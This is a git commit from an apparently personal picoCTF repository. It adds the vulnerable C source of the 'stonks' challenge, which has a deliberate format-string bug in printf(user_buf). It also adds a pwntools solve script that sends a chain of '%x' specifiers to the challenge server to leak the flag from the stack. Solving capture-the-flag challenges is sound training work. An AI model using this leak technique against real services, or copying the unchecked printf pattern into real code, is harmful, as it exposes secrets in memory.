oysteikt/picoctf
0
0
Fork 0
Code Issues Pull Requests Activity

pwn: add already solved challenges

Browse Source
This commit is contained in:
Oystein Kristoffer Tveit
2024-09-01 22:01:27 +02:00
parent a02ad89612
commit 532e093122
13 changed files with 542 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

43
pwn/stonks/solve.py Executable file
View File

@@ -0,0 +1,43 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p python3 python3Packages.pwntools
from pwn import *
ADDR = "mercury.picoctf.net 59616"
HOST, PORT = ADDR.split(" ")
def main():
for x in range(1,2):
r = remote(HOST, PORT)
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.recvline()
r.sendline(b'1')
r.recvline()
r.recvline()
r.recvline()
# r.sendline(f'%{x}$s'.encode())
# print(f'%{x}$s'.encode())
r.sendline(b"%x." * 99 + b"%x")
r.recvline()
result = r.recvline()
print(result)
unpacked = []
for x in result.strip().split(b"."):
x = int(x, 16)
print(x)
unpacked.extend([
(x & 0x000000FF),
(x & 0x0000FF00) >> 8,
(x & 0x00FF0000) >> 16,
(x & 0xFF000000) >> 24,
])
for x in unpacked:
if x >= ord('!') and x <= ord('~'):
print(chr(x), end='')
if __name__ == "__main__":
main()

148
pwn/stonks/vuln.c Normal file
View File

@@ -0,0 +1,148 @@
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#define FLAG_BUFFER 128
#define MAX_SYM_LEN 4
typedef struct Stonks {
int shares;
char symbol[MAX_SYM_LEN + 1];
struct Stonks *next;
} Stonk;
typedef struct Portfolios {
int money;
Stonk *head;
} Portfolio;
int view_portfolio(Portfolio *p) {
if (!p) {
return 1;
}
printf("\nPortfolio as of ");
fflush(stdout);
system("date"); // TODO: implement this in C
fflush(stdout);
printf("\n\n");
Stonk *head = p->head;
if (!head) {
printf("You don't own any stonks!\n");
}
while (head) {
printf("%d shares of %s\n", head->shares, head->symbol);
head = head->next;
}
return 0;
}
Stonk *pick_symbol_with_AI(int shares) {
if (shares < 1) {
return NULL;
}
Stonk *stonk = malloc(sizeof(Stonk));
stonk->shares = shares;
int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
for (int i = 0; i <= MAX_SYM_LEN; i++) {
if (i < AI_symbol_len) {
stonk->symbol[i] = 'A' + (rand() % 26);
} else {
stonk->symbol[i] = '\0';
}
}
stonk->next = NULL;
return stonk;
}
int buy_stonks(Portfolio *p) {
if (!p) {
return 1;
}
char api_buf[FLAG_BUFFER];
FILE *f = fopen("api","r");
if (!f) {
printf("Flag file not found. Contact an admin.\n");
exit(1);
}
fgets(api_buf, FLAG_BUFFER, f);
int money = p->money;
int shares = 0;
Stonk *temp = NULL;
printf("Using patented AI algorithms to buy stonks\n");
while (money > 0) {
shares = (rand() % money) + 1;
temp = pick_symbol_with_AI(shares);
temp->next = p->head;
p->head = temp;
money -= shares;
}
printf("Stonks chosen\n");
// TODO: Figure out how to read token from file, for now just ask
char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);
printf("Buying stonks with token:\n");
printf(user_buf);
// TODO: Actually use key to interact with API
view_portfolio(p);
return 0;
}
Portfolio *initialize_portfolio() {
Portfolio *p = malloc(sizeof(Portfolio));
p->money = (rand() % 2018) + 1;
p->head = NULL;
return p;
}
void free_portfolio(Portfolio *p) {
Stonk *current = p->head;
Stonk *next = NULL;
while (current) {
next = current->next;
free(current);
current = next;
}
free(p);
}
int main(int argc, char *argv[])
{
setbuf(stdout, NULL);
srand(time(NULL));
Portfolio *p = initialize_portfolio();
if (!p) {
printf("Memory failure\n");
exit(1);
}
int resp = 0;
printf("Welcome back to the trading app!\n\n");
printf("What would you like to do?\n");
printf("1) Buy some stonks!\n");
printf("2) View my portfolio\n");
scanf("%d", &resp);
if (resp == 1) {
buy_stonks(p);
} else if (resp == 2) {
view_portfolio(p);
}
free_portfolio(p);
printf("Goodbye!\n");
exit(0);
}